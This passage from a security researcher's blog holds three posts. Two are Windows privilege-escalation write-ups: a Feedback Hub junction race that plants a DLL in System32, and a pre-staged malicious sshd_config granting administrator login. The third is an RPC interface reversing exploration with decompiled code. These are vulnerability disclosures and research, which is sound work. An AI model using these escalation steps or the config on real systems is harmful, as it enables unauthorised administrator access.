The following screenshots are the PoC of how I was able to write the previous attached WindowsCoreDeviceInfo.dll in c:\windows\system32:

cattura.JPG

 

cattura.JPG

The following screenshot shows that the SetSecurity executed by the exploit happened before the creation of the directory “get info T0FolderPath

cattura.JPG

And directory successfully mounted:

cattura.JPG

Finally, file copied in target directory and EoP is just one step away 😉cattura.JPG

Two or more hard disk/partitions are present (including the possibility to mount an external USB disk)

I tested this procedure on both physical and virtual machines. In my test environment (physical and virtual machine with 2 partitions) I was able to perform the exploitation at first run. This solution is much more reliable.

Mounting an external USB disk on a physical machine can be accomplished by a standard user

First of all, run the “Feedback Hub” app and exit. This will create the initial directory and settings if never launched before.

In this scenario, we will create a junction from the directory “c:\user\<user>\documents\feedbackhub” to a directory located on another drive. This will force “reparse” operations whenever a file is opened, and this introduces delays, especially if the junction points to a different drive/partition.

When a junction is in place, the user’s “…appdata\local\temp” directory is no more used and the diagtracktempdir<XX..X> directory is directly written under the feedbackhub.

The only prerequisite is that the feedbackhub folder has to be empty, which means that that no previous Feedback Hub with Local Saving Attachments have to be done, because once the folders and  files are created, the user cannot delete them.

The following steps are required to win the race condition:

  1. Create the junction: cattura.JPG
  2. Use the junction directory instead of “…appdata\local\temp” in the C++ exploit:cattura.JPG
  3. Submit a new feedback and load a malicious DLL as attachmentcattura.JPG

Et voilà! Our dll was copied in System32 folder:

cattura.JPG

 

Conclusions

This is just  one of the still many possibilities to perform privileged file operations by abusing the generic “error reporting” functionalities in Windows 10.

If you’re hunting for for CVE’s maybe this might be worth a try. All you need is Procmon, time and patience 😉

 

POC can be downloaded here

 

 

Cattura

decoderblogblog

cattura.JPG

cattura.JPG

cattura.JPG

cattura.JPG

cattura.JPG

cattura.JPG

cattura.JPG

cattura.JPG

cattura.JPG

cattura.JPG

cattura.JPG

cattura.JPG

cattura.JPG

cattura.JPG

cattura.JPG

cattura.JPG

The strange case of “open-ssh” in Windows Server 2019

By: Decoder
19 March 2020 at 16:46

A few weeks ago I decided to install “open-ssh” on a Windows 2019 server for management purpose. The ssh server/client is based on the opensource project and MS implementation source code can be found here

Installing ssh is a very easy task, all you have to do is to install the “feature” via powershell:

ssh1

The first time you start the service, the necessary directories and files are created under the directory “c:\programdata\ssh

ssh3

 

ssh4

ssh2

A standard  “sshd_config” is created and this file is obviously readonly for  users:

ssh5

So a strange idea came in my mind: what if I created a special kind of malicious “sshd_config” file before the first launch of the open-ssh server?

As a standard user, with no special privileges, I am able to create the “ssh” directory  and write files…

And what should my “sshd_config” file contain? Well, easy: the possibility to login as an administrator with a predefined public/private key pair!

So let’s start again from the beginning…. sshd server has not yet been installed or launched for the first time.

First of all,  we need  to create a “special” sshd_config file, here the relevant parts:

StrictModes no
....
PubkeyAuthentication yes
....
Match Group administrators
     AuthorizedKeysFile c:\temp\authorized_keys
  1. StrictModes” set to “no” will bypass the owner/permissions strict checks on the “authorized_keys file”
  2. PubkeyAuthentication” set to yes will permit login via public/private keys
  3. Match Group administrators” will point to an “authorized”_keys” file generated by the user

3) is very interesting, we have the possibility to define a unique private/pubkey pair for authenticating the members of “administrators” groups..

Now we have to generate our public/private key. In this example, I will use the ssh utilities for Windows, but you can create them also on other systems (ex:Linux)

ssh1

 

Once done, we will copy the public key, in this example under c:\temp:

ssh2

Next step is creating the c:\programdata\ssh  directory and copy  the config file into it:

ssh4

At his point we have just to wait that “sshd” service will be launched, for testing we can do it on your own as an admin:

ssh5

Our config file has not been changed and we are still able to modify it!

Let’s see if it works. We are going to use OUR private/public key pair in order to login as administrator

sssh6

ssh7

 

Yes, it works! 🙂

Even if there are not so “common” preconditions, this installation/configuration  bug (which has nothing to do with the open-ssh software suite itself) could easily lead to EoP, don’t you agree?

So I informed MSRC about this, they opened a case and some days after they told me that this was already fixed with CVE-2020-757, probably as an “unintended” side effect…

Strange! My Windows 2019 server was fully patched including latest CVE’s. So I tested this on a Windows 10 machine, updated it with latest patches and actually after that I ran into an  empty “c:\programdata\ssh” folder  with correct permissions, even if open-ssh was not installed.

But why did this not happen on my Windows 2019 server?

I tested other servers as well, installed a new one from scratch and always same results, no empty c:\programdata\ssh directory!

I had a long debate about this with MSRC, basically  they were stating that they could not reproduce it and then magically, with March MS Tuesday patch, the directory was finally created with KB4538461 !

Really strange, but that’s it and given that now it’s fixed I decided to publish this post!

Stay safe, remember to keep “physical distancing” and not “social distancing” 🙂

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ssh7

💾

decoderblogblog

💾

ssh1

💾

ssh3

💾

ssh4

💾

ssh2

💾

ssh5

💾

ssh1

💾

ssh2

💾

ssh4

💾

ssh5

💾

sssh6

💾

The strange RPC interface (MS, are you trolling me?)

By: Decoder
5 February 2020 at 18:07

On a dark and stormy night, I was playing with Forshaw’s fantastic NTOBJECTMANGER library which, among the millions of things, is able to “disassemble” RPC servers  and implement Local RPC calls  in .NET.

I was looking at “interesting”  RPC servers on my Windows 10 1909 machine when my attention was caught by the “XblGameSave.dll” library.

This Dll is used by the “Xbox Live Game Service“:

xblsrv2

What is the purpose of this service? Well, I never played with Xbox nor Xbox games on Windows, but MS states that:

This service syncs save data for Xbox Live save enabled games. If this service is stopped, game save data will not upload to or download from Xbox Live.”

The service runs under the SYSTEM user context and is set to manual-triggered startup:

xblsrv

In short,  XblGameSave can be started upon a remote procedure call event.

I immediately popped up a new powershell instance as a standard user, imported  the Ntobjectmanager library and took a look at the Dll:

xbl2

Looked promising! The Dll exported a Local RPC Call “svcScheduleTaskOperation” with an Interface ID: f6c98708-c7b8-4919-887c-2ce66e78b9a0 and running as SYSTEM , maybe I could abuse  this call to  schedule a task as a privileged user?

Side note: I was able to get all these detailed information because I also specified the relative .pdb symbol file located in c:\symbols.  You can download the symbols files with the symchk.exe tool available with the Windows SDK:

symchk.exe /v c:\windows\system32\xblagamesave.dll /s 

SRV*c:\symbols\*http://msdl.microsoft.com/download/symbols

 

In order to obtain more information about the exposed interface, I created a client instance:

xbl3

The mysterious svcScheduleTaskOperation()  wanted a string as input parameter.  Next step was connect to the RPC server:

xbl4

Cool! when connecting my client I was able to trigger and start the service, so I tried to invoke the RPC call:

xbl5

 

As you can imagine, now the problem was guessing which string the function was waiting for…

The return value -2147024809  was only telling me that the parameter  was “Incorrect”. Thanks, this was a great help 😦

I hate fuzzing and bruteforcing and must admit that I’m really a noob in this field, this clearly was not the right path for me.

At this point, decompiling the Dll was no more an option! I had also the symbol file, so the odds of getting something readable and understandable by  common humans like me were founded.

xblc1This was the pseudo-C code generated by IDA, and in short, as far as I understood (I’m not that good in reversing): if input parameter was not NULL (a2), the Windows API WindowsCreateString was called and the resulting HSTRING passed to the ScheduledTaskOperation() method belonging somehow the ConnectedStorage class.

connectedstor

I obviously googled for more information with the keyword “ConnectedStorage” but surprisingly all the resulting links pointing to MS site returned a 404 error… The only way was to retrieve cached pages: https://webcache.googleusercontent.com/search?q=cache:dEN5ets6TcYJ:https://docs.microsoft.com/en-us/gaming/xbox-live/storage-platform/connected-storage/connected-storage-technical-overview

 

It seemed that the “ConnectedStorage” class, implemented in this Dll, had the following purpose:  “Store saved games and app data on Xbox One”  (and probably Windows 10 “Xbox” games too?)

My goal was not to understand the deepest and mysterious mechanisms of these classes, so I jumped to the ScheduledTaskOperation() function:

void __fastcall ConnectedStorage::Service::ScheduledTaskOperation(LPCRITICAL_SECTION lpCriticalSection, const struct ConnectedStorage::SimpleHStringWrapper *a2)
{
  const struct ConnectedStorage::SimpleHStringWrapper *v2; // rdi
  LPCRITICAL_SECTION v3; // rbx
  unsigned int v4; // eax
  const unsigned __int16 *v5; // r8
  unsigned int v6; // eax
  const unsigned __int16 *v7; // r8
  unsigned int v8; // eax
  const unsigned __int16 *v9; // r8
  unsigned int v10; // eax
  const unsigned __int16 *v11; // r8
  unsigned int v12; // eax
  const unsigned __int16 *v13; // r8
  unsigned int v14; // eax
  const unsigned __int16 *v15; // r8
  unsigned int v16; // eax
  const unsigned __int16 *v17; // r8
  unsigned int v18; // eax
  const unsigned __int16 *v19; // r8
  unsigned int v20; // eax
  const unsigned __int16 *v21; // r8
  unsigned int v22; // eax
  const unsigned __int16 *v23; // r8
  const unsigned __int16 *v24; // r8
  int v25; // [rsp+20h] [rbp-40h]
  __int64 v26; // [rsp+28h] [rbp-38h]
  LPCRITICAL_SECTION v27; // [rsp+30h] [rbp-30h]
  __int64 v28; // [rsp+38h] [rbp-28h]
  __int128 v29; // [rsp+40h] [rbp-20h]
  int v30; // [rsp+50h] [rbp-10h]
  char v31; // [rsp+54h] [rbp-Ch]
  __int16 v32; // [rsp+55h] [rbp-Bh]
  char v33; // [rsp+57h] [rbp-9h]

  v2 = a2;
  v3 = lpCriticalSection;
  v27 = lpCriticalSection;
  v28 = 0i64;
  EnterCriticalSection(lpCriticalSection);
  v26 = 0i64;
  v4 = WindowsCreateString(L"standby", 7i64, &v26);
  if ( (v4 & 0x80000000) != 0 )
    ConnectedStorage::ReportErrorAndThrow(
      (ConnectedStorage *)v4,
      (const wchar_t *)L"WindowsCreateString(str, static_cast<UINT32>(wcslen(str)), &_hstring)",
      v5);
  v25 = 0;
  v6 = WindowsCompareStringOrdinal(*(_QWORD *)v2, v26, &v25);
  if ( (v6 & 0x80000000) != 0 )
    ConnectedStorage::ReportErrorAndThrow(
      (ConnectedStorage *)v6,
      (const wchar_t *)L"WindowsCompareStringOrdinal(_hstring, right._hstring, &result)",
      v7);
  WindowsDeleteString(v26);
  if ( v25 )
  {
    v26 = 0i64;
    v8 = WindowsCreateString(L"maintenance", 11i64, &v26);
    if ( (v8 & 0x80000000) != 0 )
      ConnectedStorage::ReportErrorAndThrow(
        (ConnectedStorage *)v8,
        (const wchar_t *)L"WindowsCreateString(str, static_cast<UINT32>(wcslen(str)), &_hstring)",
        v9);
    v25 = 0;
    v10 = WindowsCompareStringOrdinal(*(_QWORD *)v2, v26, &v25);
    if ( (v10 & 0x80000000) != 0 )
      ConnectedStorage::ReportErrorAndThrow(
        (ConnectedStorage *)v10,
        (const wchar_t *)L"WindowsCompareStringOrdinal(_hstring, right._hstring, &result)",
        v11);
    WindowsDeleteString(v26);
    if ( v25 )
    {
      v26 = 0i64;
      v12 = WindowsCreateString(L"testenter", 9i64, &v26);
      if ( (v12 & 0x80000000) != 0 )
        ConnectedStorage::ReportErrorAndThrow(
          (ConnectedStorage *)v12,
          (const wchar_t *)L"WindowsCreateString(str, static_cast<UINT32>(wcslen(str)), &_hstring)",
          v13);
      v25 = 0;
      v14 = WindowsCompareStringOrdinal(*(_QWORD *)v2, v26, &v25);
      if ( (v14 & 0x80000000) != 0 )
        ConnectedStorage::ReportErrorAndThrow(
          (ConnectedStorage *)v14,
          (const wchar_t *)L"WindowsCompareStringOrdinal(_hstring, right._hstring, &result)",
          v15);
      WindowsDeleteString(v26);
      if ( !v25 )
      {
        v31 = 1;
LABEL_11:
        v30 = 4;
        _mm_storeu_si128((__m128i *)&v29, (__m128i)GUID_LOW_POWER_EPOCH);
        v33 = 0;
        v32 = 0;
        ConnectedStorage::Power::PowerChangeCallback(v3 + 4, 0i64, &v29);
        goto LABEL_12;
      }
      v26 = 0i64;
      v16 = WindowsCreateString(L"testexit", 8i64, &v26);
      if ( (v16 & 0x80000000) != 0 )
        ConnectedStorage::ReportErrorAndThrow(
          (ConnectedStorage *)v16,
          (const wchar_t *)L"WindowsCreateString(str, static_cast<UINT32>(wcslen(str)), &_hstring)",
          v17);
      v25 = 0;
      v18 = WindowsCompareStringOrdinal(*(_QWORD *)v2, v26, &v25);
      if ( (v18 & 0x80000000) != 0 )
        ConnectedStorage::ReportErrorAndThrow(
          (ConnectedStorage *)v18,
          (const wchar_t *)L"WindowsCompareStringOrdinal(_hstring, right._hstring, &result)",
          v19);
      WindowsDeleteString(v26);
      if ( !v25 )
      {
        v31 = 0;
        goto LABEL_11;
      }
      v26 = 0i64;
      v20 = WindowsCreateString(L"logon", 5i64, &v26);
      if ( (v20 & 0x80000000) != 0 )
        ConnectedStorage::ReportErrorAndThrow(
          (ConnectedStorage *)v20,
          (const wchar_t *)L"WindowsCreateString(str, static_cast<UINT32>(wcslen(str)), &_hstring)",
          v21);
      v25 = 0;
      v22 = WindowsCompareStringOrdinal(*(_QWORD *)v2, v26, &v25);
      if ( (v22 & 0x80000000) != 0 )
        ConnectedStorage::ReportErrorAndThrow(
          (ConnectedStorage *)v22,
          (const wchar_t *)L"WindowsCompareStringOrdinal(_hstring, right._hstring, &result)",
          v23);
      WindowsDeleteString(v26);
      if ( v25 )
        ConnectedStorage::ReportErrorAndThrow(
          (ConnectedStorage *)0x80070057i64,
          (const wchar_t *)L"Service::ScheduledTaskOperation called with an invalid operation type.",
          v24);
    }
  }
LABEL_12:
  LeaveCriticalSection(v3);
}


 

In short:

  • the expected input strings were “logon“, “standby“,”maintenance“, “testenter“, “testexit
  • logon“, “standby“,”maintenance” did nothing! (fake??)
  • testenter” and “testexit” called the PowerChangeCallback  method with a  parameter set to  GUID_LOW_POWER_EPOCH and a flag set  1 if  “testenter” and 0 if “testexit“. This GUID identifies  a “low power state” of the device.

The disassembled  output of the PowerChangeCallback was the following:

__int64 __fastcall ConnectedStorage::Power::PowerChangeCallback(LPCRITICAL_SECTION lpCriticalSection, __int64 a2, __int64 a3)
{
  LPCRITICAL_SECTION v3; // rdi
  int v4; // ebx
  HANDLE v5; // rcx
  __int64 v6; // rdx
  __int64 v7; // r8
  HANDLE v8; // rcx
  DWORD v10; // eax
  const unsigned __int16 *v11; // r8
  ConnectedStorage *v12; // rcx
  DWORD v13; // eax
  const unsigned __int16 *v14; // r8
  ConnectedStorage *v15; // rcx

  v3 = lpCriticalSection;
  v4 = *(_DWORD *)(a3 + 20);
  EnterCriticalSection(lpCriticalSection);
  v5 = v3[1].OwningThread;
  if ( v4 )
  {
    LOBYTE(v3[1].LockSemaphore) = 1;
    if ( !ResetEvent(v5) )
    {
      v13 = GetLastError();
      v15 = (ConnectedStorage *)((unsigned __int16)v13 | 0x80070000);
      if ( (signed int)v13 <= 0 )
        v15 = (ConnectedStorage *)v13;
      ConnectedStorage::ReportErrorAndThrow(v15, L"Event: ResetEvent failed", v14);
    }
    v8 = v3[2].OwningThread;
  }
  else
  {
    LOBYTE(v3[1].LockSemaphore) = 0;
    if ( !SetEvent(v5) )
    {
      v10 = GetLastError();
      v12 = (ConnectedStorage *)((unsigned __int16)v10 | 0x80070000);
      if ( (signed int)v10 <= 0 )
        v12 = (ConnectedStorage *)v10;
      ConnectedStorage::ReportErrorAndThrow(v12, L"Event: SetEvent failed", v11);
    }
    v8 = *(HANDLE *)&v3[3].LockCount;
  }
  if ( v8 )
    (*(void (__fastcall **)(HANDLE, __int64, __int64))(*(_QWORD *)v8 + 8i64))(v8, v6, v7);
  LeaveCriticalSection(v3);
  return 0i64;
}

This function was responsible for setting (“testenter“) and resetting (“testexit“) event objects in order to notify a waiting thread of the occurrence of the particular event ( I presume “low power change” in this case).

So back to us, what could I do with the original svcScheduleTaskOperation RPCcall ?

Probably nothing useful, maybe it has been exposed  only for testing purpose. Why did MS not implement the other functions like logon, maintenance, standby ?

And why did they call it svcScheduleTaskOperation ? Perhaps they will complete it in a future Windows release?

Mystery!

captxbl

As you can see, all legitimate commands returned 0  (success), that was a cold comfort 😦

My research sadly led to a dead end, but perhaps there are other forgotten or or leftover RPC interfaces to look for?

That’s all, for now 🙂

 

 

 

rpc

decoderblogblog

xblsrv2

xblsrv

xbl2

xbl3

xbl4

xbl5

xblc1

connectedstor

captxbl

❌
❌